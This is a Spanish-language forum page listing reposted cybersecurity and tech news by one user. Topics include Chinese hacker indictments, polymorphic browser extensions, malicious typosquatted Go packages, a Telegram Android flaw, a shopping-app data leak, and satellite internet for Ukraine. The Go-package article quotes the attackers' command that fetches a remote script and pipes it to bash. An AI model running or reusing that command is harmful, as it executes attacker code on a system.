Mostrar Mensajes

Información del Perfil

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - AXCESS

Páginas 1 ... 44 45 46 47 48 ... 249

#901

Noticias Informáticas / US. ofrece 10 millones de dólares de recompensa por hackers

Marzo 06, 2025, 03:56:42 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En una importante operación coordinada, varias agencias de aplicación de la ley de Estados Unidos han acusado a 12 ciudadanos chinos de una serie de ataques cibernéticos que afectaron a organismos gubernamentales, grupos religiosos, organizaciones de medios de comunicación y gobiernos internacionales.

Entre los acusados se encuentran dos funcionarios del servicio de seguridad pública de China, empleados de una empresa tecnológica china y miembros de un supuesto grupo de piratas informáticos conocido como APT27, que también se denomina Iron Tiger, Emissary Panda, LuckyMouse, TG-3390 y Bronze Union.

Funcionarios del Departamento de Justicia, el FBI, el Servicio de Investigación Criminal Naval y los Departamentos de Estado y del Tesoro hicieron los anuncios, vinculando a estos actores cibernéticos con operaciones dirigidas por las agencias de seguridad del estado de China.

Según documentos judiciales, los piratas informáticos llevaron a cabo ataques desde aproximadamente 2016 hasta 2023, comprometiendo datos críticos a través de una serie de intrusiones informáticas. En muchos casos, los perpetradores ganaron sumas importantes vendiendo la información robada a agencias gubernamentales chinas.

En su comunicado de prensa, el Departamento de Justicia de Estados Unidos afirmó que una parte clave de la investigación involucra a una empresa privada, i-Soon Information Technology. Un tribunal federal de Manhattan hizo pública una acusación formal que acusa a ocho empleados de i-Soon y a dos agentes de seguridad pública de violar cuentas de correo electrónico, teléfonos móviles, servidores y sitios web.

El sistema de penetración de i-Soon y su software que evita la autenticación multifactor de Gmail
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El tribunal también ha autorizado la confiscación del dominio principal de Internet vinculado a este grupo, que ha estado vinculado a actividades cibernéticas que incluyen ataques contra críticos radicados en Estados Unidos, una organización religiosa estadounidense y varios medios de comunicación.

Al mismo tiempo, se han presentado acusaciones separadas contra miembros del grupo de piratas informáticos APT27, que han estado activos desde al menos 2013. Estos cargos detallan esfuerzos para infiltrarse en redes en una variedad de sectores, desde empresas de tecnología y centros de estudios hasta bufetes de abogados y universidades.

Entre las acusaciones se encuentra un reciente ataque al Tesoro de Estados Unidos realizado a fines del año pasado, donde el uso de servidores privados virtuales alquilados jugó un papel clave. Los investigadores han confiscado la infraestructura digital vinculada a estas operaciones para desmantelar la red. Estos son los nombres y cargos de los acusados:

Ma Li (马丽), personal técnico

Wang Zhe (王哲), director de ventas

Sheng Jing (盛晶), oficial de MPS

Xu Liang (徐梁), personal técnico

Wang Liyu (王立宇), oficial de MPS

Wang Yan (王堰), personal técnico

Zhou Weiwei (周伟伟), personal técnico

Liang Guodong (梁国栋), personal técnico

Wu Haibo (吴海波), director ejecutivo

Chen Cheng (陈诚), director de operaciones

Las autoridades encargadas de hacer cumplir la ley también han hecho hincapié en que los atacantes no eran sólo agentes patrocinados por el Estado, sino que también trabajaban como autónomos y a través de empresas privadas. Su amplia gama de objetivos ha dejado muchos sistemas expuestos a nuevos incidentes cibernéticos, lo que ha causado importantes daños financieros y de reputación a las organizaciones afectadas.

En respuesta a estas acciones, las autoridades estadounidenses han ofrecido atractivas recompensas por información que conduzca a la identificación o ubicación de algunos de estos actores cibernéticos. Una oferta de recompensa es de hasta 10 millones de dólares por detalles sobre ciertas personas vinculadas a la red de piratería, mientras que otro programa ofrece hasta 2 millones de dólares por información sobre otras personas que operan desde China.

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#902

Noticias Informáticas / Extensiones polimórficas: Infostealers en extensión del navegador

Marzo 06, 2025, 03:51:15 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Con las recientes revelaciones de ataques como el Browser Syncjacking y los ladrones de información de extensiones, las extensiones de navegador se han convertido en una preocupación de seguridad principal en muchas organizaciones.

El equipo de investigación de SquareX descubre una nueva clase de extensiones maliciosas que pueden hacerse pasar por cualquier extensión instalada en el navegador de la víctima, incluidos los administradores de contraseñas y las billeteras de criptomonedas.

Estas extensiones maliciosas pueden transformarse para tener exactamente la misma interfaz de usuario, los mismos íconos y el mismo texto que la extensión legítima, lo que las convierte en un caso extremadamente convincente para que las víctimas ingresen sus credenciales y otra información confidencial.

Este ataque afecta a la mayoría de los navegadores principales, incluidos Chrome y Edge.

Las extensiones polimórficas funcionan explotando el hecho de que la mayoría de los usuarios interactúan con las extensiones a través de la barra de herramientas del navegador. El ataque comienza cuando el usuario instala la extensión maliciosa, que se disfraza, por ejemplo, como una herramienta de inteligencia artificial discreta. Para que el ataque sea aún más convincente, la extensión realiza la funcionalidad de inteligencia artificial como se anuncia y permanece benigna durante un período de tiempo predeterminado.

Sin embargo, mientras todo esto sucede, la extensión maliciosa comienza a averiguar qué otras extensiones están instaladas en el navegador de la víctima. Una vez identificada, la extensión polimórfica cambia por completo su propia apariencia para parecerse a la del objetivo, incluido el icono que se muestra en la barra de herramientas fijada. Incluso puede desactivar temporalmente la extensión de destino, eliminándola de la barra fijada. Dado que la mayoría de los usuarios utilizan estos iconos como una confirmación visual para informar con qué extensión están interactuando, es probable que cambiar el icono en sí sea suficiente para convencer al usuario medio de que está haciendo clic en la extensión legítima. Incluso si la víctima navega hasta el panel de control de la extensión, no hay una forma obvia de correlacionar las herramientas que se muestran allí con los iconos fijados. Para evitar sospechas, la extensión maliciosa puede incluso desactivar temporalmente la extensión de destino de modo que sean los únicos que tengan el icono del objetivo en la pestaña fijada.

Fundamentalmente, la extensión polimórfica puede hacerse pasar por cualquier extensión del navegador. Por ejemplo, puede imitar a los administradores de contraseñas populares para engañar a las víctimas para que introduzcan su contraseña maestra.

El atacante puede usar esta contraseña para iniciar sesión en el administrador de contraseñas real y acceder a todas las credenciales almacenadas en la bóveda de contraseñas. De manera similar, la extensión polimórfica también puede imitar las billeteras de criptomonedas populares, lo que les permite usar las credenciales robadas para autorizar transacciones para enviar criptomonedas al atacante. Otros objetivos potenciales incluyen herramientas para desarrolladores y extensiones bancarias que pueden proporcionar al atacante acceso no autorizado a aplicaciones donde se almacenan datos confidenciales o activos financieros.

Además, el ataque solo requiere permisos de riesgo medio según la clasificación de Chrome Store. Irónicamente, muchos de estos permisos son utilizados por los propios administradores de contraseñas, así como por otras herramientas populares como bloqueadores de anuncios y estilizadores de páginas, lo que hace que sea especialmente difícil para Chrome Store y los equipos de seguridad identificar intenciones maliciosas con solo mirar el código de la extensión.

El fundador de SquareX, Vivek Ramachandran, advierte que "las extensiones del navegador presentan un riesgo importante para las empresas y los usuarios actuales. Desafortunadamente, la mayoría de las organizaciones no tienen forma de auditar su huella de extensiones actual y verificar si son maliciosas. Esto subraya aún más la necesidad de una solución de seguridad nativa del navegador como Browser Detection and Response, similar a lo que un EDR es para el sistema operativo".

Estas extensiones polimórficas explotan las características existentes dentro de Chrome para llevar a cabo el ataque. Como tal, no hay ningún error de software involucrado y no se puede parchear.

SquareX ha escrito a Chrome para una divulgación responsable, recomendando la prohibición o la implementación de alertas de usuario para cualquier cambio de ícono de extensión o cambios abruptos en HTML, ya que los atacantes pueden aprovechar fácilmente estas técnicas para suplantar otras extensiones en un ataque polimórfico. Para las empresas, el análisis estático de extensiones y las políticas basadas en permisos ya no son suficientes: es fundamental tener una herramienta de seguridad nativa del navegador que pueda analizar dinámicamente el comportamiento de las extensiones en tiempo de ejecución, incluidas las tendencias polimórficas de las extensiones maliciosas.

Para obtener más información sobre las extensiones polimórficas, los hallazgos adicionales de esta investigación están disponibles en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Acerca de SquareX

SquareX ayuda a las organizaciones a detectar, mitigar y buscar amenazas de ataques web del lado del cliente que ocurren contra sus usuarios en tiempo real, incluida la defensa contra extensiones maliciosas. Además del ataque polimórfico, SquareX también fue el primero en descubrir y revelar múltiples ataques basados en extensiones, incluido el Browser Syncjacking, el ataque de phishing de consentimiento de Chrome Store que condujo a la violación de Cyberhaven y muchas otras extensiones maliciosas compatibles con MV3 reveladas en DEF CON 32.

La solución de detección y respuesta del navegador (BDR) de SquareX, la primera en la industria, adopta un enfoque centrado en los ataques para la seguridad del navegador, lo que garantiza que los usuarios empresariales estén protegidos contra amenazas avanzadas como códigos QR maliciosos, phishing de navegador en el navegador, malware basado en macros y otros ataques web que abarcan archivos maliciosos, sitios web, scripts y redes comprometidas.

Además, con SquareX, las empresas pueden proporcionar a los contratistas y trabajadores remotos acceso seguro a aplicaciones internas, SaaS empresarial y convertir los navegadores en dispositivos BYOD/no administrados en sesiones de navegación confiables.

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#903

Noticias Informáticas / Malware infecta Linux y macOS a través de paquetes Go typosquatted

Marzo 06, 2025, 03:48:00 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Socket expone una campaña de typosquatting que distribuye malware a sistemas Linux y macOS a través de paquetes Go maliciosos. Descubra las tácticas utilizadas, incluida la ofuscación y el typosquatting de dominios, y aprenda a mantenerse a salvo.

Los investigadores de ciberseguridad del proveedor de soluciones de seguridad para la cadena de suministro de software, Socket, han descubierto una nueva tendencia preocupante en la que los actores maliciosos se dirigen cada vez más a los desarrolladores dentro de la red del lenguaje de programación Go.

Al emplear una técnica conocida como typosquatting, estos atacantes distribuyen malware disfrazado de paquetes Go legítimos, que están diseñados para instalar cargadores de malware ocultos en sistemas Linux y macOS.

La investigación de Socket, compartida con You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, muestra que los atacantes han publicado al menos siete de estos paquetes engañosos en Go Module Mirror, un repositorio central para módulos Go.

La lista completa incluye:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Estos paquetes se hacen pasar por bibliotecas populares, como "hypert" para probar clientes de API HTTP y "layout" para el desarrollo de la interfaz de usuario.

Detalles contextuales del paquete de diseño

El paquete "hiperactivo" parece estar dirigido específicamente a los desarrolladores del sector financiero.

Detalles contextuales del paquete Hypert malicioso

Este paquete malicioso contiene funciones ocultas (como qcJjJne()) que permiten la ejecución remota de código. Al ser importado a un proyecto, el código malicioso descarga y ejecuta silenciosamente un script desde un servidor remoto (alturastreeticu), que, a su vez, instala un archivo ejecutable que puede robar datos o credenciales confidenciales.

Para evadir la detección, los atacantes emplean varias técnicas. Por ejemplo, utilizan la ofuscación de cadenas basada en matrices para ocultar los comandos maliciosos dentro del código, lo que dificulta que las herramientas de seguridad tradicionales identifiquen la amenaza. Por ejemplo, el comando

wget -O - https://alturastreeticu/storage/de373d0df/a31546bf | /bin/bash & se divide en cadenas de un solo carácter y se reconstruye utilizando una indexación no secuencial.

Además, el script malicioso incorpora un retraso de tiempo, esperando una hora antes de obtener la carga útil final, lo que les ayuda a eludir las medidas de seguridad que se centran en acciones inmediatas.

Los dominios maliciosos utilizados en esta campaña suelen parecerse a sitios web legítimos, en particular los relacionados con instituciones financieras. Esta táctica, conocida como domain typosquatting, tiene como objetivo engañar a los usuarios explotando su confianza en nombres y marcas familiares.

Los atacantes también están reutilizando cargas útiles y nombres de archivos similares en diferentes dominios y direcciones IP, lo que sugiere un esfuerzo coordinado y persistente.

El archivo ELF f0eee999, por ejemplo, muestra un comportamiento malicioso mínimo inicial, como leer /sys/kernel/mm/transparent_hugepage/, alineándose con un criptominero o cargador que permanece inactivo hasta que se cumplen las condiciones. Este archivo, junto con el script a31546bf, se ha observado en la investigación de Mads Hougesen, "Rogue One: A Malware Story", lo que indica posibles conexiones y tendencias más amplias, señalaron los investigadores.

La investigación de Socket destaca los crecientes riesgos asociados con los ataques a la cadena de suministro de software, donde los actores maliciosos apuntan a los desarrolladores y comprometen la integridad de las bibliotecas y paquetes ampliamente utilizados.

Se recomienda a los desarrolladores que estén atentos al incorporar paquetes externos a sus proyectos. Las herramientas de escaneo en tiempo real y las extensiones del navegador, junto con las auditorías de código y las prácticas cuidadosas de gestión de dependencias, son cruciales. Los desarrolladores también deben verificar la integridad de los paquetes, monitorear los nuevos repositorios y compartir indicadores de compromiso dentro de la comunidad.

Thomas Richards, consultor principal, director de práctica de redes y equipos rojos en Black Duck, un proveedor de soluciones de seguridad de aplicaciones con sede en Burlington, Massachusetts, comentó sobre el último desarrollo diciendo:

"Este ataque de typosquatting no es un nuevo vector de ataque, sin embargo, aún subraya lo importante que es administrar el riesgo del software y verificar que los módulos sean legítimos antes de integrarlos en el código fuente. La verificación de los paquetes generalmente se realiza firmándolos antes de agregarlos a un repositorio central. Cualquier aplicación que se desarrolle en Go debe revisarse de inmediato para asegurarse de que los paquetes maliciosos no estén presentes y los sistemas no se hayan visto comprometidos".

Fuente:
HackRead
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#904

Noticias Informáticas / Fallo en Telegram para Android permite disfrazar malware como vídeos

Marzo 06, 2025, 03:02:03 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los atacantes de Telegram están disfrazando scripts maliciosos como videos y engañando a los usuarios para que los ejecuten. Hacer clic accidentalmente filtrará algunos datos del usuario y puede provocar instalaciones forzadas de aplicaciones maliciosas.

Un investigador de seguridad que se hace llamar 0x6rss ha detallado una vulnerabilidad llamada EvilLoader que afecta a la aplicación de Android de Telegram. Es similar al error del año pasado cuando los atacantes enviaron directamente a los usuarios archivos APK disfrazados de videos para adultos.

Si bien Telegram corrigió la falla anterior, el investigador descubrió que su API aún permite a los atacantes disfrazar archivos maliciosos como videos.

Los atacantes pueden disfrazar un archivo .htm como un video y enviarlo a usuarios desprevenidos. Esta extensión se usa para archivos de páginas web guardados con el lenguaje de marcado de hipertexto (HTML). Sin embargo, las páginas web también pueden incluir y ejecutar código JavaScript (JS).

Si un usuario de Telegram intenta reproducir el archivo disfrazado, se ejecutará el código JavaScript dentro del HTML. Esto permite a los atacantes descargar y ejecutar cargas útiles maliciosas adicionales.

0x6rss describió un escenario teórico en el que un video falso no puede abrirse con un reproductor de video y luego redirige al usuario al navegador predeterminado, lo que permite que se ejecute el código JS malicioso.

Esto ya conduce a la dirección IP del usuario, pero el ataque no está completo. El archivo puede entonces imitar cualquier sitio web legítimo o redirigir a otros sitios web maliciosos. En el ejemplo proporcionado, el investigador falsificó la tienda Google Play, ofreciendo al usuario instalar una aplicación falsa de Google Play Protect.

Los usuarios recibirían algunas señales de alerta en forma de ventanas emergentes: tendrían que habilitar la instalación de aplicaciones de terceros y otorgarles permisos para tener control total sobre su dispositivo. Google protege a los usuarios de Android con Play Protect y advierte a los usuarios o bloquea las aplicaciones maliciosas conocidas que provienen de fuera de Play Store.

"La razón principal de la vulnerabilidad es que el formato de archivo '.htm' en la respuesta a los servidores de Telegram se percibe como un video", dijo el investigador en una publicación de blog.

"Se abre el contenido, lo que permite que se active y abra la página HTML especificada".

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Básicamente, la falla se encuentra en la forma en que la aplicación de Telegram para Android interpreta y procesa los archivos recibidos a través de la API. La aplicación intenta manejar el archivo .htm como un video y permite que se ejecute el código JS.

La prueba de concepto (PoC) de la falla ya está disponible públicamente:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#905

Noticias Informáticas / US quiere investigar a inmigrantes basándose en sus publicaciones en Facebook

Marzo 06, 2025, 02:59:51 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Estados Unidos está utilizando las redes sociales para investigar a los inmigrantes, y las publicaciones "problemáticas" pueden llevar a la denegación o la deportación. ¿Está en riesgo la libertad de expresión?

En 2025, el Servicio de Ciudadanía e Inmigración de Estados Unidos (USCIS) comenzará a utilizar las redes sociales para investigar a los inmigrantes.

La directiva del presidente Trump del 20 de enero tiene como objetivo reforzar la seguridad nacional, y el contenido en línea "problemático" puede llevar a la denegación o la deportación. Pero, ¿qué se considera "problemático" y cómo afectará a la libertad de expresión?

El USCIS está ampliando su proceso de investigación para incluir las publicaciones de los inmigrantes en las redes sociales, informó Newsweek. Se podría exigir a los solicitantes que revelen todos los canales de redes sociales, de forma similar a la lista de activos en un formulario de seguro. La pregunta es: ¿qué se califica como "contenido problemático"?

¿Algo tan simple como publicar letras anarquistas de una banda mexicana podría resultar en la denegación? ¿Cómo se interpretarán las opiniones políticas o las publicaciones irónicas?

Líneas rojas difusas

Esta no es la primera vez que se utilizan las redes sociales para filtrar a los inmigrantes. En 2017, la administración de Trump implementó el proceso de "investigación extrema", en el que se examinaban minuciosamente los canales de redes sociales de los solicitantes, junto con su controvertida prohibición de viajes dirigida a países predominantemente musulmanes.

Sin embargo, en 2025, esta política se extenderá a quienes ya están en Estados Unidos con tarjetas verdes, lo que genera inquietudes sobre el efecto paralizante sobre la libertad de expresión, en particular para quienes expresan sentimientos políticos en línea.

Ampliar la red

Un caso de 2019 pone de relieve las consecuencias de esta política. A Ismail Ajjawi, un estudiante palestino, se le negó la entrada a Estados Unidos porque algunos de sus amigos habían publicado contenido antiestadounidense.

A pesar de que Ajjawi no publicó nada, las opiniones de sus amigos fueron suficientes para etiquetarlo de "cuestionable". Esto ejemplifica cómo la política podría afectar a las personas por asociación.

La legislación de 2025 plantea inquietudes sobre la autocensura. Si los inmigrantes y los titulares de tarjetas verdes temen que sus publicaciones en línea conduzcan a la deportación, las redes sociales podrían convertirse en una plataforma de silencio.

Si otros países siguen el ejemplo, podría indicar el surgimiento de políticas de inmigración más restrictivas y autoritarias, que conduzcan a una vigilancia excesiva y al castigo de la disidencia.

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#906

Noticias Informáticas / ¡Appa!: fuga de la app pone en riesgo a millones de argentinos

Marzo 05, 2025, 11:49:13 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Más de un millón de compradores en Argentina quedaron expuestos y vulnerables al fraude cuando la aplicación ¡appa! filtró su información de compra privada.

[Su sentimiento y rostro en este mismo instante >>> si es argentino:]

Una de las aplicaciones de compras más populares de Argentina, con un millón de descargas en Google Play Store, sufrió un error de ciberseguridad que filtró los datos privados de más de un millón de clientes.

Fundada en 2018, la aplicación ¡appa! evolucionó hasta convertirse en una plataforma de software como servicio (SaaS) para centros comerciales. Disponible en más de una docena de supermercados, ¡appa! ofrece diferentes servicios para los visitantes de los centros comerciales, desde pagar el estacionamiento hasta acceder a descuentos, programas de recompensas y beneficios.

El equipo de investigación de Cybernews descubrió un bucket de Amazon AWS S3 mal configurado que almacenaba más de mil archivos CSV con datos confidenciales vinculados con la empresa argentina a principios de noviembre del año pasado. Es preocupante que, a pesar de los múltiples intentos de comunicarse con la empresa, la instancia permanezca abierta al público.

¿Qué datos de ¡apps! se filtraron?:

Nombres completos

Fechas de nacimiento

Números de identificación nacional – Documento Nacional de Identidad (DNI)

Direcciones de correo electrónico

Números de teléfono

Información de compra, incluyendo hora y fecha de transacción, método de pago, monto gastado, número de tarjeta de fidelidad, tienda y centro comercial donde se realizaron las transacciones

El alcance de la filtración es muy preocupante, ya que afecta aproximadamente al 2,4% de la población argentina. La falta de una acción rápida socava la confianza y pone en tela de juicio la eficacia de las medidas de seguridad establecidas para proteger los datos de los usuarios y la postura general de seguridad de la empresa. De acuerdo con las normas nacionales de seguridad de datos, la empresa podría ser objeto de multas.

¡appa! Los usuarios corren el riesgo de ser víctimas de fraude

Aunque no hay indicios de que actores maliciosos hayan accedido a los archivos expuestos, los atacantes escanean continuamente la web en busca de servidores desprotegidos. Si nuestros investigadores hubieran podido encontrar los datos filtrados, los cibercriminales podrían haber hecho lo mismo.

El contenedor expuesto es una mina de oro para los ataques de phishing: cuanto más sepan los cibercriminales sobre usted, más probabilidades hay de que caiga en sus mentiras.

Imagine recibir un correo electrónico o un mensaje SMS con su nombre, correo electrónico y todos los detalles de su compra reciente, y pedirle que haga clic en el enlace para proporcionar información adicional.

También puede recibir una alerta sobre una nueva oferta especial en su programa de fidelización: para reclamarla, solo tiene que hacer clic en el enlace proporcionado. Es mucho más probable que las víctimas caigan en las trampas de los impostores, creyendo que se trata de una comunicación legítima relacionada con una compra.

Los enlaces de phishing podrían incitar a las víctimas a revelar los detalles de su cuenta financiera o enviar malware que podría vaciar las aplicaciones bancarias de las víctimas.

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#907

Noticias Informáticas / ¿Podría Eutelsat de Europa ayudar a reemplazar a Starlink en Ucrania?

Marzo 05, 2025, 11:46:31 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Las sugerencias de que Ucrania podría perder el acceso al sistema de internet satelital Starlink de Elon Musk, que ha sido vital para mantener sus comunicaciones militares mientras lucha contra la invasión rusa, han centrado el interés de los inversores en el rival europeo más pequeño de Starlink, Eutelsat.

Los negociadores estadounidenses dijeron a Reuters el mes pasado que podrían usar el acceso a Starlink como una palanca en las conversaciones con Kiev sobre sus minerales críticos, y la compañía franco-británica ha dicho que está hablando con la UE sobre la posibilidad de proporcionar servicios adicionales a Ucrania.

El precio de las acciones de Eutelsat se ha más que cuadriplicado desde una disputa pública el 28 de febrero entre el presidente ucraniano Volodymyr Zelenskiy y el presidente estadounidense Donald Trump, después de la cual Washington suspendió la ayuda militar a Ucrania.

A continuación, se presenta un resumen de cómo Eutelsat podría ayudar a Ucrania a satisfacer sus necesidades de comunicación:

¿Qué importancia tiene Starlink para Ucrania?

Los usuarios de Starlink acceden a Internet para comunicarse con datos o voz mediante una pequeña antena parabólica que hace rebotar señales en una constelación de satélites.

Las redes fijas y móviles de Ucrania han resultado gravemente dañadas por los bombardeos desde que Rusia invadió el país en febrero de 2022, y Starlink ha ayudado a Kiev a llenar el vacío enviando decenas de miles de sus antenas con terminales.

Algunas están disponibles para los civiles, que a menudo intentan comunicarse con sus familiares a través de teléfonos inteligentes.

Pero la mayoría son utilizadas por las fuerzas armadas de Ucrania, que también tienen que lidiar con una gran interferencia de señales e interceptación de comunicaciones en las líneas del frente. Las unidades ucranianas a menudo se comunican entre sí a través de Starlink, y sus servicios se han vuelto prácticamente indispensables para el mando y control del campo de batalla.

Ucrania también utilizó Starlink para guiar drones de ataque hasta que la empresa de cohetes de Musk, SpaceX, frenó la práctica hace dos años.

Originalmente, SpaceX ayudó a financiar la provisión de Starlink a Ucrania. El gobierno de Estados Unidos tomó entonces el control, aunque el mes pasado Polonia dijo que había estado pagando la suscripción a Starlink de Ucrania y que continuaría haciéndolo.

¿Cómo se compara Eutelsat con Starlink?

Eutelsat ya respalda las comunicaciones gubernamentales e institucionales en Ucrania, y dijo a Reuters que puede proporcionar una alternativa para ciertas aplicaciones gubernamentales y de defensa.

Desde su fusión en 2023 con OneWeb de Gran Bretaña, Eutelsat controla la única constelación operativa de cobertura global, además de Starlink, de satélites en órbita terrestre baja (LEO).

Los más de 7.000 satélites LEO de Starlink, adecuados para la comunicación en tiempo real, le permiten llegar a más usuarios en todo el mundo y ofrecer velocidades de datos más altas.

Pero Eutelsat dice que, incluso con solo 630 satélites LEO, respaldados por 35 satélites vinculados en una órbita geoestacionaria más alta, ofrece las mismas capacidades que Starlink en Europa.

Starlink promete banda ancha de hasta 200 megabits por segundo, Eutelsat 150.

Sin embargo, los terminales OneWeb cuestan hasta 10.000 dólares, más un precio de suscripción mensual. Starlink cobra a los usuarios ucranianos un pago único de 589 dólares además de una suscripción mensual de 95 a 440 dólares, según el uso.

No se sabe si algún donante se ofrecería a financiar más suscripciones a OneWeb en Ucrania. Francia y Gran Bretaña, que están encabezando un acuerdo de paz para presentarlo a los EE.UU., tienen una participación combinada del 24,8% en Eutelsat Group.

¿Existen otras alternativas?

La competencia global para Starlink está tomando forma, pero lentamente.

SES, con sede en Luxemburgo, ofrece algunos servicios satelitales a la alianza de defensa occidental de la OTAN a través de su constelación de satélites O3b mPOWER en órbita terrestre media.

Pero, como muchos otros operadores de satélites tradicionales, prioriza a los clientes corporativos, los gobiernos y los militares, y no ofrece servicios directos al consumidor, con terminales que no son fáciles de usar para el consumidor.

Algunas iniciativas de la UE, como IRIS² (que se pronuncia "Iris al cuadrado") y GOVSATCOM (en la que Kiev está interesada), tardarán años en estar completamente operativas.

Fuente:
CyberNews
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#908

Noticias Informáticas / Samsung finalmente pone fecha al lanzamiento estable de One UI 7

Marzo 05, 2025, 11:44:19 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Mientras Samsung nos bombardea con versiones beta aparentemente interminables, todos esperamos pacientemente el lanzamiento oficial de One UI 7. Sin embargo, el final ya está a la vista. La compañía finalmente ha puesto una fecha para su último lanzamiento de software e incluyó más detalles sobre las próximas actualizaciones beta.

Samsung ha confirmado que "la actualización oficial de One UI 7 estará disponible a partir de abril". No se ha facilitado la fecha exacta, pero por fin podemos marcar con un rotulador rojo el cuarto mes del año.

One UI 7 cambia el enfoque de Samsung hacia Android, incluyendo un marcado rediseño estético, actualizaciones del Quick Panel y la experiencia del launcher, y varias nuevas funciones de IA. El software está disponible en la serie Galaxy S25 desde enero. Sin embargo, el último anuncio de Samsung afectará a aquellos con dispositivos compatibles más antiguos.

Antes del lanzamiento estable de One UI 7, Samsung está agregando varios dispositivos nuevos a su programa beta. Más específicamente, los propietarios de Galaxy Z Fold 6 y Galaxy Z Flip 6 en los Estados Unidos, Corea, India y el Reino Unido pueden esperar la disponibilidad de la versión beta a partir de esta semana. Aquellos que utilicen las tabletas de la serie Galaxy S23 o Galaxy Tab S10 deberán esperar hasta finales de este mes. Estos dispositivos se unirán a la serie Galaxy S24, que ya ha visto una oleada de versiones beta desde diciembre.

Como es habitual, si se encuentra en una región compatible y utiliza uno de los dispositivos mencionados, puede registrarse en el programa beta de One UI 7 a través de la aplicación Samsung Members.

Fuente:
AndroidAuthority
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#909

Noticias Informáticas / GTA V finalmente recibe su actualización de "próxima generación" en PC

Marzo 05, 2025, 01:44:18 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los jugadores de PC de Grand Theft Auto V por fin han alcanzado la paridad con sus hermanos de consola. Tras un anuncio el mes pasado, hoy Rockstar Games ha lanzado una actualización para PC con funciones que durante varios años solo habían estado disponibles para la última generación de consolas.

Es una actualización gratuita para cualquiera que ya tuviera una copia del popular juego. La versión original de GTA V ha sido eliminada de las tiendas de PC a favor de la nueva versión ampliada y mejorada del juego, que incluye una copia de la antigua edición Legacy. Tanto el modo historia como el progreso en línea se pueden migrar a la versión más reciente. La actualización incluye mejoras técnicas que debutaron en las consolas, así como algunas funciones de trazado de rayos específicas para PC si se cumplen las especificaciones recomendadas. También hay algunas pequeñas incorporaciones al contenido, como vida salvaje ambiental, desafíos fotográficos, nuevos vehículos y acceso al servicio de suscripción GTA+.

Rockstar Games ha estado mejorando varias entregas de su franquicia GTA a lo largo de los años. Lanzó una trilogía de remasterizaciones para Grand Theft Auto III, GTA: Vice City y GTA: San Andreas, además de proporcionar estas actualizaciones para GTA V y Grand Theft Auto Online. Y si bien los fanáticos de la serie pueden disfrutar de toda la nostalgia, es seguro decir que las expectativas son muy altas para el próximo Grand Theft Auto VI.

Fuente:
Yahoo News
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#910

Dudas y pedidos generales / Re:Consulta win11

Marzo 04, 2025, 11:18:05 PM

En mi experiencia cualquier dispositivo que sea de 5ta en adelante (Intel) o su equivalente en AMD. Nada de celerones o similares.

Pudiera ser en un dispositivo de 4ta o incluso 3ra generación, pero con memorias en Dual Chanel (2x8 de un mismo tipo) y con un disco duro de los rápidos.

El disco duro puede ser de cualquier tipo (teniendo en cuenta la generación del micro), pero... Windows 11 "exige/demanda velocidad en el hardware (memoria-disco-micro)" y esto se nota en el rendimiento si es pesado.

Con las actualizaciones Windows 11 tiende a hacerse "más pesado" y el tener buen hardware lo compensa.

Lo del TPM es fácilmente saltable (hasta el momento).

#911

Noticias Informáticas / Nuevo Zhong Stealer infecta a empresas de tecnología financiera

Marzo 04, 2025, 11:03:34 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una nueva amenaza de malware llamada Zhong Stealer ha surgido de China y ya se está infiltrando en las empresas a través de un punto de entrada inesperado: los chats de atención al cliente. Este malware que roba información se está infiltrando actualmente en las empresas de tecnología financiera explotando a los agentes de soporte, pero la mayor preocupación es su adaptabilidad.

Zhong Stealer se puede reutilizar fácilmente para atacar a cualquier industria que dependa de equipos de atención al cliente: hotelería, atención médica, comercio minorista y más.

